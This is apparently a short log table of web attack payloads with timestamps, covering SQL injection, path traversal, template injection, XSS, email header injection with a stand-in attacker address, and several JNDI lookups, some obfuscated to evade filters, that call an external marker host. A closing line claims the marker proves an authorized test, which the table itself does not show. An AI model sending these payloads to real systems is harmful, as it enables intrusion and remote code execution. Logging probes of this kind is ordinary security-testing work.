| ID | Timestamp | Payload | Type |
|---|---|---|---|
| 8278 | 2026-05-17T14:22:19Z | ' OR 1=1-- | SQL injection |
| 8279 | 2026-05-17T14:22:21Z | ../../etc/passwd | Path traversal |
| 8280 | 2026-05-17T14:22:23Z | {{7*7}} | Template injection (SSTI) |
| 8281 | 2026-05-17T14:22:25Z | <script> | XSS |
| 8282 | 2026-05-17T14:22:27Z | ${jndi:ldap://x} | JNDI lookup |
| 8283 | 2026-05-17T14:22:29Z | aaaa… (~230 chars) | Buffer/overflow test |
| 8311 | 2026-05-17T14:46:54Z | ${jndi:ldap://audit-marker-research.invalid/a} | JNDI (LDAP) |
| 8312 | 2026-05-17T14:46:56Z | ${jndi:dns://audit-marker-research.invalid} | JNDI (DNS) |
| 8313 | 2026-05-17T14:46:58Z | ${jndi:rmi://audit-marker-research.invalid/a} | JNDI (RMI) |
| 8314 | 2026-05-17T14:47:00Z | ${jndi:${lower:l}${lower:d}ap://audit-marker-research.invalid/a} | Obfuscated JNDI |
| 8315 | 2026-05-17T14:47:02Z | ${${::-j}${::-n}${::-d}${::-i}:ldap://audit-marker-research.invalid/a} | Obfuscated JNDI |
| 8324 | 2026-05-17T14:48:02Z | Bcc: attacker@evil.test | Email header injection |
The audit-marker-research.invalid marker in the JNDI payloads confirms this was an internal/authorized test, not an external attack.